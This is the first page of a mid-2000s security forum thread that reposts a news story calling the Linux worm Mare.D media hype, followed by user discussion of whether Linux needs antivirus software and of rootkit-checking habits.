Page 1 of 3 123 LastLast
Results 1 to 10 of 22

Thread: Ignore the Linux worm hype, say security vendors

  1. #1
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177

    Ignore the Linux worm hype, say security vendors

    Media reports circulating about the threat posed by a Linux worm called Mare.D have been written off as little more than the result of a "slow news week" by one leading antivirus expert.

    The stories stemmed from a fairly innocuous warning on F-Secure's blog about the virus which is targeting open source vulnerabilities, known about since last year, and the risk of infection is believed to be negligible.
    A worm that tries to find exploits over a year old??????? This is on an OS where you only need to reboot for Kernel patches..... Looking at the Slackware.com security patches, for 10.0 10.1 and 10.2 there hasn't even BEEN a Kernel patch.



    As such other security companies have told Silicon.com they are baffled by the media coverage the worm has attracted.

    But even F-Secure is confused as to how a run-of-the-mill blog posting has turned into a news story.

    Richard Hales, country manager at F-Secure, told Silicon.com: "I don't know why anybody has picked up on this anymore than they normally would. Our blog is there for commenting on everything from whether the chips were cold at a conference to reporting the latest variant of a worm. But if it's something serious we'd put out a warning and we'd issue a press release.

    "Perhaps because this had 'Linux' in the title it attracted a bit more interest."

    He said: "It does seem very odd to me to highlight a vector that is a year old and is very likely patched in production systems."

    Russ Cooper, senior information security analyst at CyberTrust, went further, suggesting the media is simply trying to "work up a lather among communities which don't normally buy antivirus software". He was referring to the fact a Linux worm might be seen as more newsworthy even if "there are no reports in the wild".

    Cooper added: "It must be a slow news week."

    Graham Cluley, senior technology consultant at Sophos, agreed. He confirmed his company had seen no reports of the virus and suggested novelty factor, rather than genuine threat may be behind the story.

    Cluley told Silicon.com: "At the moment, malware for all kinds of non-Microsoft platforms are making the news because of their novelty value I think. It's important that people who don't use Microsoft Windows realise that attacks do happen on other OSes but it's also important to keep these things in perspective."

    He added: "The problem is huge on Windows with 120,000-plus pieces of malware that figure is humongous compared to Macintosh, Unix and so on."
    http://www.zdnetindia.com/news/secur...es/134140.html

  2. #2
    Senior Member
    Join Date
    Feb 2002
    Posts
    855
    Does Linux really need anti-virus software? What are you opinions?

    Here's something you might want to read and comment on:

    http://linuxmafia.com/~rick/faq/index.php?page=virus
    For the wages of sin is death, but the free gift of God is eternal life in Christ Jesus our Lord.
    (Romans 6:23, WEB)

  3. #3
    Senior Member
    Join Date
    Jul 2004
    Posts
    548
    Originally posted here by preacherman481
    Does Linux really need anti-virus software? What are you opinions?
    I don't think a Linux system needs an anti-virus to protect _itself_ from viruses, but rather to stop any Windows viruses it might have downloaded on it or in an email attachment from spreading and infecting other users. You are very unlikely to be infected by a Linux virus, and even if you are the chances are that not much damage will be caused (unless you're dumb enough to use root as your daily account ).

    Anti-viruses are used more on Linux servers/routers than desktops for this reason - because any Windows computers which might use it as a gateway or access it for others reasons could catch a virus that the server has. That's why even though ClamAV has thousands of virus signatures, only an insignificant amount of those are Linux ones

    Cheers,

    -jk

    Ps. Thanks for the notice gore - I hadn't even heard all the news about it

  4. #4
    Originally posted here by preacherman481
    Does Linux really need anti-virus software? What are you opinions?

    Here's something you might want to read and comment on:

    http://linuxmafia.com/~rick/faq/index.php?page=virus
    If you simply never run untrusted executables while logged in as the root user (or equivalent), all the "virus checkers" in the world will be at best superfluous; at worst, downright harmful. "Hostile" executables (including viruses) are almost unfindable in the Linux world — and no real threat to it — because they lack root-user authority, and because Linux admins are seldom stupid enough to run untrusted executables as root, and because Linux users' sources for privileged executables enjoy paranoid-grade scrutiny (such that any unauthorised changes would be detected and remedied).
    There's only one problem with that idea -- as Mac users are discovering[1], any OS is capable of having malware, and a bit of malware running as a user is still capable of destroying everything that user cares about. Who cares if the underlying OS is chugging away happily, if you can't log in as you and all your files are corrupted/destroyed/whatever?


    [1] http://isc.sans.org/diary.php?storyid=1138 is a good intro.

  5. #5
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    On Linux and BSD, I don't use Anti Virus for anything but mail scanning..

    I do run chkrootkit and rkhunter on a daily basis.. (cron) And get mailed if any mallware gets in..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  6. #6
    Senior Member
    Join Date
    Feb 2002
    Posts
    855
    I do run chkrootkit and rkhunter on a daily basis.. (cron) And get mailed if any mallware gets in..
    Hi,
    Have you ever had any get in, and if so, what was it?
    For the wages of sin is death, but the free gift of God is eternal life in Christ Jesus our Lord.
    (Romans 6:23, WEB)

  7. #7
    Originally posted here by the_JinX
    On Linux and BSD, I don't use Anti Virus for anything but mail scanning..

    I do run chkrootkit and rkhunter on a daily basis.. (cron) And get mailed if any mallware gets in..



    Yeah it's good to be prepared just in case.

  8. #8
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    Originally posted here by preacherman481
    Hi,
    Have you ever had any get in, and if so, what was it?
    My old webserver was once infected by some massmailer..
    It also hooked up an LKM rootkit (can't remember the name)..
    Because of the firewall (a seperate machine) the atacker couldn't attach to the rootkit..

    We did clean out the entire box.. and did a reinstall..

    But havn't had anything in the last two years..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  9. #9
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401

    Re: Ignore the Linux worm hype, say security vendors

    Originally posted here by gore
    A worm that tries to find exploits over a year old??????? This is on an OS where you only need to reboot for Kernel patches..... Looking at the Slackware.com security patches, for 10.0 10.1 and 10.2 there hasn't even BEEN a Kernel patch.
    Mare.D doesn't exploit any kernelbugs.. It exploits vulnerable scripts in Mambo CMS and XML-RPC (PHP).. The only reason it's called a Linux worm is because of a compiled C program that gets dropped.. The executable was compiled specifically for Linux..
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  10. #10
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Re-Read what that says. I was pointing out that Slackware Linux has had no Kernel updates in a long time, therefore no patches have required a reboot on Slackware, and this sploit was fixed over a year ago so there was no reason to not install the patch on a production machine as you wouldn't need to reboot it.

    I wasn't saying the thing had anything to do with the Kernel, merely pointing out for our BSOD loving members that on some OSs reboots are only for hardware and Kernel code and the maybe reason of why no one saw it at all.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •